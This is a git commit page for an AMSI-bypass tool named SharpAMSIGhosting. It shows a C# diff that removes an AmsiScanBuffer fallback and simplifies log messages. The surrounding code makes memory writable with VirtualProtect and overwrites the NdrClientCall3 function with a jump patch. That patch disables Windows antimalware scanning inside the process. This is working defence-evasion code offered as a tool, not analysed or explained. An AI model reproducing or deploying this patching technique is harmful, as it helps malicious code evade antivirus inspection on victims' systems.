diff options
| author | heqnx <root@heqnx.com> | 2025-05-02 13:54:21 +0300 |
|---|---|---|
| committer | heqnx <root@heqnx.com> | 2025-05-02 13:54:21 +0300 |
| commit | d4273e7230aad0b6ad3e86675513710b7e48b774 (patch) | |
| tree | 281bb6a2404a5680faf08cbe00c5affe412a8a96 | |
| parent | 220bd56c7a3abc0a9c02e820ecc1ee7e2b0b1b5f (diff) | |
| download | SharpAMSIGhosting-d4273e7230aad0b6ad3e86675513710b7e48b774.tar.gz SharpAMSIGhosting-d4273e7230aad0b6ad3e86675513710b7e48b774.zip | |
removed the amsiscanbuffer fallbackv1.0.0
| -rw-r--r-- | SharpAMSIGhosting/Program.cs | 9 |
1 files changed, 4 insertions, 5 deletions
diff --git a/SharpAMSIGhosting/Program.cs b/SharpAMSIGhosting/Program.cs index 75fb518..c9405e6 100644 --- a/SharpAMSIGhosting/Program.cs +++ b/SharpAMSIGhosting/Program.cs @@ -84,10 +84,10 @@ namespace AmsiGhost bool protectResult = Mem.VirtualProtect(func, new UIntPtr(PATCH_SIZE), PAGE_EXECUTE_READWRITE, out oldProtect);
if (!protectResult)
{
- Console.WriteLine($"[-] Failed to unprotect {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} memory");
+ Console.WriteLine("[-] Failed to unprotect NdrClientCall3 memory");
return;
}
- Console.WriteLine($"[+] {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} memory unprotected");
+ Console.WriteLine("[+] NdrClientCall3 memory unprotected");
long trampAddr = trampoline.ToInt64();
byte[] patch = new byte[] { 0x48, 0xB8 }
@@ -95,9 +95,8 @@ namespace AmsiGhost .Concat(new byte[] { 0xFF, 0xE0 })
.ToArray();
Marshal.Copy(patch, 0, func, patch.Length);
- Console.WriteLine($"[+] Patch written to {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")}");
-
- Console.WriteLine($"[+] {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} patched - AMSI Ghosting");
+ Console.WriteLine("[+] Patch written to NdrClientCall3");
+ Console.WriteLine("[+] NdrClientCall3 patched - AMSI ghosting complete");
}
catch (Exception ex)
{
|